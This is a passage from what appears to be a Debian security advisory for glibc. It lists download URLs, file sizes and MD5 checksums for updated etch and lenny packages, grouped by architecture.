2b2b80db7302e627759aff52510a45b8\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.3.6.ds1-13etch10_s390.udeb\n Size/MD5 checksum: 1008270 3a194ceb125a02010d25f6c62d39ef28\n http://security.debian.org/pool/updates/main/g/glibc/libc6-s390x_2.3.6.ds1-13etch10_s390.deb\n Size/MD5 checksum: 3535982 3a007c7ec6450a8007c2d320a07658ee\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.3.6.ds1-13etch10_s390.deb\n Size/MD5 checksum: 1316416 3ae384f44e89d2aff071ea9a67dbadc7\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.3.6.ds1-13etch10_s390.deb\n Size/MD5 checksum: 147524 952daa0e7e3a9984fae3995c0ee962e0\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.3.6.ds1-13etch10_s390.deb\n Size/MD5 checksum: 3167560 1f25b6b1f0f1edaf7d484fecf639818e\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.3.6.ds1-13etch10_s390.udeb\n Size/MD5 checksum: 9012 1113448f2d4c7e31694ee99e9223abd9\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-sparcv9b_2.3.6.ds1-13etch10_sparc.deb\n Size/MD5 checksum: 1371620 79631ea0782eba78a574a9fdafbd6fbf\n http://security.debian.org/pool/updates/main/g/glibc/libc6-sparc64_2.3.6.ds1-13etch10_sparc.deb\n Size/MD5 checksum: 3764028 c6d7d08b5dea96cc33d4c8a65c0b769d\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.3.6.ds1-13etch10_sparc.udeb\n Size/MD5 checksum: 8028 863e0fbeabdb472240c031aed594f05c\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.3.6.ds1-13etch10_sparc.deb\n Size/MD5 checksum: 1298880 e254764758fe6186a09af76dc6227d6a\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.3.6.ds1-13etch10_sparc.deb\n Size/MD5 checksum: 5875134 3818f7ae808ed9fa0585904f2e3edc54\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.3.6.ds1-13etch10_sparc.udeb\n Size/MD5 checksum: 13796 7be4cb1c2e1a5d12be74b21b24451716\n http://security.debian.org/pool/updates/main/g/glibc/libc6-sparcv9_2.3.6.ds1-13etch10_sparc.deb\n Size/MD5 checksum: 1370586 a00ba5e3a64f2105e1a5afd451196516\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.3.6.ds1-13etch10_sparc.deb\n Size/MD5 checksum: 140922 674a9a630a30af952a32a6f372fb0ab5\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.3.6.ds1-13etch10_sparc.deb\n Size/MD5 checksum: 2112298 ac3373a80bd3d520876a57bebc410cb4\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-sparc64_2.3.6.ds1-13etch10_sparc.deb\n Size/MD5 checksum: 1730334 40744da7817503b254825bac950ba549\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.3.6.ds1-13etch10_sparc.deb\n Size/MD5 checksum: 6496208 cbea78c5cbc2c6f700c0252821bba629\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.3.6.ds1-13etch10_sparc.deb\n Size/MD5 checksum: 4032548 15b770200539f0064f0f37d61982f3ca\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.3.6.ds1-13etch10_sparc.deb\n Size/MD5 checksum: 1617226 dd99794ebfe1b2f6c6f77ba0d98d9a30\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.3.6.ds1-13etch10_sparc.udeb\n Size/MD5 checksum: 950022 ebe0c21b87cb51560e61d31dc996c4fc\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/g/glibc/glibc_2.7.orig.tar.gz\n Size/MD5 checksum: 15386750 8816fbab13a072c0ccef6640c9d20833\n http://security.debian.org/pool/updates/main/g/glibc/glibc_2.7-18lenny2.diff.gz\n Size/MD5 checksum: 746080 490b5454e410e7e6d173f35ed6d12068\n http://security.debian.org/pool/updates/main/g/glibc/glibc_2.7-18lenny2.dsc\n Size/MD5 checksum: 2564 348520fae28f63a32cfe8a6dc520231c\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/g/glibc/locales_2.7-18lenny2_all.deb\n Size/MD5 checksum: 4489926 58c7260aea726ee23a0e50d84595b540\n http://security.debian.org/pool/updates/main/g/glibc/glibc-doc_2.7-18lenny2_all.deb\n Size/MD5 checksum: 1628986 e785ce5ce122129805c5a90757970061\n http://security.debian.org/pool/updates/main/g/glibc/glibc-source_2.7-18lenny2_all.deb\n Size/MD5 checksum: 16005994 704856f12c5c9c43a8d5dd904af45b03\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dbg_2.7-18lenny2_alpha.deb\n Size/MD5 checksum: 5703992 1e28928fc815db99243932aea5d59268\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-pic_2.7-18lenny2_alpha.deb\n Size/MD5 checksum: 1768052 e3d30a9c3bbcb2368a4d9f735753818f\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-prof_2.7-18lenny2_alpha.deb\n Size/MD5 checksum: 2491854 b11ea9cbf797baa2685972298991e621\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_alpha.udeb\n Size/MD5 checksum: 18210 8808bde93a15babf4dd2d7aef0c636fa\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-udeb_2.7-18lenny2_alpha.udeb\n Size/MD5 checksum: 1265288 b5a093c6f640e12ecd256093499aec96\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_alpha.udeb\n Size/MD5 checksum: 10602 d11a1e2f9635d89ebe9959179ac0d535\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dev_2.7-18lenny2_alpha.deb\n Size/MD5 checksum: 3021266 080f48c5d5194aaefcbe9a815bf7e5c4\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_alpha.deb\n Size/MD5 checksum: 177244 cbe47153322beb5200ae523fb626d887\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1_2.7-18lenny2_alpha.deb\n Size/MD5 checksum: 5073386 3f9fa22d43cc24bb9217a6a429df0123\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-alphaev67_2.7-18lenny2_alpha.deb\n Size/MD5 checksum: 1619356 08b8a38ed95c2a0bf262b96613b92e8c\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_alpha.deb\n Size/MD5 checksum: 2601134 4f4b91cf366e2460b7687805756852fd\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny2_amd64.deb\n Size/MD5 checksum: 4943528 3e346b14fa2b9c94831bbc6c55ad0a9c\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny2_amd64.deb\n Size/MD5 checksum: 2500286 84ac8cf67157116099b9d69e2204938e\n http://security.debian.org/pool/updates/main/g/glibc/libc6-i386_2.7-18lenny2_amd64.deb\n Size/MD5 checksum: 3770620 3f1fc4d0314277fd1280628165d1b51f\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny2_amd64.deb\n Size/MD5 checksum: 1930498 6b4d7b8770f5bb3f92c91b8d51cfdd0a\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_amd64.udeb\n Size/MD5 checksum: 9424 970ad8c9008aa3bec774e43998dd67be\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_amd64.deb\n Size/MD5 checksum: 2817198 163b74300875d0be87c31ac66fbc5680\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_amd64.deb\n Size/MD5 checksum: 175180 b36bdf7656d0dd59cd388aa2b8851af2\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_amd64.udeb\n Size/MD5 checksum: 18312 c7138b8d033137c69b67287f460850de\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny2_amd64.udeb\n Size/MD5 checksum: 1107426 f27f61c75477eb9d8173c99dd7e508aa\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny2_amd64.deb\n Size/MD5 checksum: 5325274 47407046998843dd3f01c04710f7350e\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny2_amd64.deb\n Size/MD5 checksum: 1466462 60a0df28964b34b9b500ae26e258add5\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-i386_2.7-18lenny2_amd64.deb\n Size/MD5 checksum: 1459344 b0055d1d44deaaeb44c15ff5a0c51bb4\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_arm.deb\n Size/MD5 checksum: 2756622 e1c12d28cfd7f3683fe909ec33a0b66e\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny2_arm.deb\n Size/MD5 checksum: 5074250 cf85932be43b8776d3fd2d589eaaeb98\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny2_arm.deb\n Size/MD5 checksum: 4808312 8e11a8611586b9ec9bce864da8335366\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_arm.deb\n Size/MD5 checksum: 171722 4f5512c87e1df5dca971620134b23d45\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny2_arm.deb\n Size/MD5 checksum: 1778662 6cf4752aaf08ad6de2f9698878a707fe\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_arm.udeb\n Size/MD5 checksum: 14572 d6a4e6a0c0c44f655b737e47021dcda3\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny2_arm.deb\n Size/MD5 checksum: 1322990 98ebb1d8a74dc0b3464f05f6cbab5517\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_arm.udeb\n Size/MD5 checksum: 8414 902cdd777e422bc3735e2f7587aca2e0\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny2_arm.deb\n Size/MD5 checksum: 2323068 c8b65b89b6f87d269bb5c3e1023d4b4a\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny2_arm.udeb\n Size/MD5 checksum: 1026906 011e1ab66503227f16e320fda5d3e447\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_armel.deb\n Size/MD5 checksum: 2708680 58315aefbbc51c938d019fb3abc0d94b\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny2_armel.deb\n Size/MD5 checksum: 5115280 f8024499b92402b2d02e706d1ce1c151\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny2_armel.deb\n Size/MD5 checksum: 1894458 7b03b0ef484839f75d16d1751c5c57c3\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny2_armel.deb\n Size/MD5 checksum: 4868310 c129c2d0d56ed558348681af351c817d\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_armel.udeb\n Size/MD5 checksum: 8162 78685a7f84495a547a25eb0201360ebb\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_armel.deb\n Size/MD5 checksum: 171160 2ad73e2817c7791aba47ad906f7ec331\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_armel.udeb\n Size/MD5 checksum: 14556 fea4a3f52fc8b757a23122810369b200\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny2_armel.deb\n Size/MD5 checksum: 2433206 79e93a7a12bd77bb31b9df502875b891\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny2_armel.deb\n Size/MD5 checksum: 1394360 e5ca11beddb701d400646475c9ceb3ff\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny2_armel.udeb\n Size/MD5 checksum: 1085008 e6b65afadcc6390b5ef2b68db9125c12\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny2_hppa.deb\n Size/MD5 checksum: 2486110 7854a6b13311afef62e03049e6a3dbab\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_hppa.deb\n Size/MD5 checksum: 2873236 ce20efc1253b972f3410e4ff5bfb0423\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny2_hppa.deb\n Size/MD5 checksum: 5117228 d59fcc88f6f56c26d1e03f1c4ec5e68d\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_hppa.deb\n Size/MD5 checksum: 179292 f7f1e4f361bbb646c3919bdaf4b4f3af\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny2_hppa.udeb\n Size/MD5 checksum: 1121310 12070cf5b91e96dd8cc3eef9edc15e2c\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_hppa.udeb\n Size/MD5 checksum: 18532 9a2837c889118e26e5445031ec9b547c\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny2_hppa.deb\n Size/MD5 checksum: 1471786 72cb70fb13887000721b0a227dd27e68\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_hppa.udeb\n Size/MD5 checksum: 9746 2fe4879a6c8df0581e0cf39f48d7df64\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny2_hppa.deb\n Size/MD5 checksum: 5944866 3d54e0a015ec1d110365b631cec11ba7\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny2_hppa.deb\n Size/MD5 checksum: 1957758 9549e5a1110fce44475163140d6beff0\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny2_i386.deb\n Size/MD5 checksum: 1438844 8b725a142c5b41f0a1e0b04126705396\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_i386.deb\n Size/MD5 checksum: 2609544 9208c479b2848947c465b9d95ae2a6b3\n http://security.debian.org/pool/updates/main/g/glibc/libc6-i686_2.7-18lenny2_i386.deb\n Size/MD5 checksum: 1270768 e3a08867e7fbbc94f4bce24f03e9fdaf\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-amd64_2.7-18lenny2_i386.deb\n Size/MD5 checksum: 2012298 7b138a3e488296f5bf119953e3ba8bdd\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny2_i386.udeb\n Size/MD5 checksum: 822696 b341db54cccebd1c1361bfe82bc5a51a\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_i386.deb\n Size/MD5 checksum: 171868 b65e22f6b508d2220e9a342c64cb396b\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny2_i386.deb\n Size/MD5 checksum: 3388434 76ee9a2cff02f23d2f9dba562d220e8c\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_i386.udeb\n Size/MD5 checksum: 15434 0bc4bd1ac488ecf431a2b4b90390b9c6\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny2_i386.deb\n Size/MD5 checksum: 1154848 3dd9ef36198b752c1d5767e480088be7\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_i386.udeb\n Size/MD5 checksum: 8686 0c5cc05611daecd9b9af17a76ca4cd46\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny2_i386.deb\n Size/MD5 checksum: 5229412 5ba20fc70b4a0643db07780480575193\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny2_i386.deb\n Size/MD5 checksum: 4555042 77db7003bd2aba9fee8a7609e6829a35\n http://security.debian.org/pool/updates/main/g/glibc/libc6-xen_2.7-18lenny2_i386.deb\n Size/MD5 checksum: 1274546 b2d3d16f1c5fa5150db2003a000a8564\n http://security.debian.org/pool/updates/main/g/glibc/libc6-amd64_2.7-18lenny2_i386.deb\n Size/MD5 checksum: 4191796 519c08c149029bf988045a45b74ba1c4\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dbg_2.7-18lenny2_ia64.deb\n Size/MD5 checksum: 6261652 06e88c0da93fd7dab0829847a0f94deb\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_ia64.udeb\n Size/MD5 checksum: 22610 7fe0c2d35af30d4eec8d0176d65c1e51\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-prof_2.7-18lenny2_ia64.deb\n Size/MD5 checksum: 2691134 eb2fd2d4fc61fa7c237f32b379791d2f\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_ia64.deb\n Size/MD5 checksum: 197792 63b2679123616dce20c69f6579255958\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1_2.7-18lenny2_ia64.deb\n Size/MD5 checksum: 5615338 75d10e4f9e5bd92f4c7089f810b25d20\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_ia64.deb\n Size/MD5 checksum: 2605826 fff74128c928247980ff44cedcfbd120\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_ia64.udeb\n Size/MD5 checksum: 12942 eb26ffb3b5c56da8e92ba2b764be25a3\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-udeb_2.7-18lenny2_ia64.udeb\n Size/MD5 checksum: 1382410 4bdef86179309a310b727db9bee1c1cd\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-pic_2.7-18lenny2_ia64.deb\n Size/MD5 checksum: 1743264 6916eb62e98cdefa6eeb94283d78e9a8\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dev_2.7-18lenny2_ia64.deb\n Size/MD5 checksum: 3229900 47564364622287000f2028b532d85274\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-mips64_2.7-18lenny2_mips.deb\n Size/MD5 checksum: 2501772 a9c994c2a6d2d8859f77103d7293cfbc\n http://security.debian.org/pool/updates/main/g/glibc/libc6-mips64_2.7-18lenny2_mips.deb\n Size/MD5 checksum: 4345656 fbfa2ed8539cbea8c1d981a9cd96222f\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny2_mips.deb\n Size/MD5 checksum: 4959034 1a477fa61bc6b3f96869bf0838fda506\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny2_mips.deb\n Size/MD5 checksum: 5620066 0fd560b86bb369d07dbc2965ba325944\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_mips.deb\n Size/MD5 checksum: 172290 cf2d29e7e6faaeb1491abf86a0b64fdf\n http://security.debian.org/pool/updates/main/g/glibc/libc6-mipsn32_2.7-18lenny2_mips.deb\n Size/MD5 checksum: 9231240 2d06878bb84a3374beffb79127034545\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_mips.deb\n Size/MD5 checksum: 2820678 8776ba861436c437aa136a1eddfe2dc4\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_mips.udeb\n Size/MD5 checksum: 8898 85ecef4337104110ded8585bda514cc1\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-mipsn32_2.7-18lenny2_mips.deb\n Size/MD5 checksum: 2359702 40a18b8d89e8c01815ec5dfeae53eb52\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_mips.udeb\n Size/MD5 checksum: 15266 f66760387c706f0103f2ea247d6fcffc\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny2_mips.udeb\n Size/MD5 checksum: 1074188 0b9ce8713a1c6a17ce143f9fffee0a2f\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny2_mips.deb\n Size/MD5 checksum: 1496538 1d86b7a69d985b336e2d58576254a42b\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny2_mips.deb\n Size/MD5 checksum: 2633674 4f5a4773acb2111122d38aebf3439a3c\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny2_mips.deb\n Size/MD5 checksum: 2083630 aaca1a0ee1f7a2b30603b6fac62dbed3\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-mips64_2.7-18lenny2_mipsel.deb\n Size/MD5 checksum: 2463852 e5b0165885f705f17b820f399425e825\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-mipsn32_2.7-18lenny2_mipsel.deb\n Size/MD5 checksum: 2339670 13d9a03a536d5f2f0c22dcd6239fabbe\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny2_mipsel.deb\n Size/MD5 checksum: 2615826 e29ffa82388552659e0acc5108f6c9fe\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_mipsel.udeb\n Size/MD5 checksum: 15348 ecc6d361c89ddcd3cca7290f089ba293\n http://security.debian.org/pool/updates/main/g/glibc/libc6-mips64_2.7-18lenny2_mipsel.deb\n Size/MD5 checksum: 4126610 11fc76ee2fd0366d811e1e55d55918ff\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny2_mipsel.deb\n Size/MD5 checksum: 5539956 1d663ec97755153e6aee1ddfe1e324bd\n http://security.debian.org/pool/updates/main/g/glibc/libc6-mipsn32_2.7-18lenny2_mipsel.deb\n Size/MD5 checksum: 8466102 789770a4922b0147ac156e9e507bb2d3\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_mipsel.deb\n Size/MD5 checksum: 172792 d689fe228a3b099a7a0ebebb72fb056b\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny2_mipsel.deb\n Size/MD5 checksum: 4738338 e528dc94e19c75c8fa6351208539d0dd\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny2_mipsel.deb\n Size/MD5 checksum: 2070860 e3b560a426a6f75415036f2fddf2d860\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny2_mipsel.deb\n Size/MD5 checksum: 1493698 37245b6bf1a164ddce55249f5b2355e7\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_mipsel.udeb\n Size/MD5 checksum: 8942 081da2d0324d7b98485372886a449ec2\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_mipsel.deb\n Size/MD5 checksum: 2613302 2da5860103233044aef5d5ed595e13ad\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny2_mipsel.udeb\n Size/MD5 checksum: 1070786 715579ba7139c2a177196c98520b1d77\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny2_powerpc.deb\n Size/MD5 checksum: 6327312 4e82d32cc64aeca28c04268fd9689759\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny2_powerpc.udeb\n Size/MD5 checksum: 1223180 cbe7be52720f663d49a338abbce598d1\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny2_powerpc.deb\n Size/MD5 checksum: 2807238 57156dfd9423e1f7fd18707d96d17f97\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny2_powerpc.deb\n Size/MD5 checksum: 2258072 3141c4be19b9516dd497e4b230943073\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_powerpc.udeb\n Size/MD5 checksum: 16840 6a855c5a27b897dc5d0a5b9538bb6112\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny2_powerpc.deb\n Size/MD5 checksum: 5187586 e781552852cd5bef6573b6ac79da6cd2\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny2_powerpc.deb\n Size/MD5 checksum: 1597596 3848878797e1357f9801641527407072\n http://security.debian.org/pool/updates/main/g/glibc/libc6-ppc64_2.7-18lenny2_powerpc.deb\n Size/MD5 checksum: 4482256 9ef7584df9c460e79bd55087b8afbacb\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_powerpc.deb\n Size/MD5 checksum: 2731956 53fa26eb5a7257fea505c0cfbd0bc27b\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_powerpc.udeb\n Size/MD5 checksum: 9410 7e569e9cd33808010ee9cafc3606fc32\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_powerpc.deb\n Size/MD5 checksum: 174318 4d0f0c87cbc49b6d59613810e7e3bd02\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-ppc64_2.7-18lenny2_powerpc.deb\n Size/MD5 checksum: 2412278 951695c8d70561915752d0e108ddc095\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny2_s390.udeb\n Size/MD5 checksum: 1218440 eff74770d12052a2bf26f4e7c0b6ce34\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_s390.udeb\n Size/MD5 checksum: 9036 a15bdabe36b94e53962e476d6e18b519\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny2_s390.deb\n Size/MD5 checksum: 2196564 453a074e5b5e9665bb813c294dfbf4dd\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny2_s390.deb\n Size/MD5 checksum: 5981776 8bfa7838e842921d6c5c259078798d2c\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_s390.deb\n Size/MD5 checksum: 176934 7124f9f9ff2d66cdbbdd3bdc5e6ed992\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-s390x_2.7-18lenny2_s390.deb\n Size/MD5 checksum: 2367030 418bce5568280066783091c0c309eda2\n http://security.debian.org/pool/updates/main/g/glibc/libc6-s390x_2.7-18lenny2_s390.deb\n Size/MD5 checksum: 4388378 31232cf4d26d726dc5b9de329c8d0110\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny2_s390.deb\n Size/MD5 checksum: 1535084 17c12e5b45bb66e2c9bd6d7beeb8eb05\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny2_s390.deb\n Size/MD5 checksum: 2723494 5b7a3162feff0b5ad3ef2baa047bb50e\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_s390.udeb\n Size/MD5 checksum: 16200 343189b4f868ac4d3ad23f8138688804\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny2_s390.deb\n Size/MD5 checksum: 5141992 ae8b844ab9c7aabde154ceb5e72fc5e3\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_s390.deb\n Size/MD5 checksum: 2717816 7e4a2e9f7be65e0ee1e330fa48704eb9\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny2_sparc.deb\n Size/MD5 checksum: 1611578 37d781b03d4ce123fe7c8c103f091a42\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny2_sparc.deb\n Size/MD5 checksum: 5139444 92f997c7daaaf71153d8a1e8d21f7314\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_sparc.deb\n Size/MD5 checksum: 2763278 7080ac750fb3d6a906b89d2eddc78092\n http://security.debian.org/pool/updates/main/g/glibc/libc6-sparc64_2.7-18lenny2_sparc.deb\n Size/MD5 checksum: 4454740 51f6317b56e0a5ff575aadbc5f2bb77b\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny2_sparc.udeb\n Size/MD5 checksum: 1250048 860e14abe61ba8c10362dc86c87ee15e\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_sparc.udeb\n Size/MD5 checksum: 8322 fde787c6133156005b9fa32e27a1f2db\n http://security.debian.org/pool/updates/main/g/glibc/libc6-sparcv9b_2.7-18lenny2_sparc.deb\n Size/MD5 checksum: 1753772 0da91632598f26a946c68edcc146d3f2\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny2_sparc.deb\n Size/MD5 checksum: 2824922 14294cead6b6eef9101cad16cc3b88db\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny2_sparc.deb\n Size/MD5 checksum: 2300946 243cb9e68528dfa6687663ae0d71607d\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_sparc.deb\n Size/MD5 checksum: 170526 0c6f87544f48534b4f4101290a7c7c3a\n 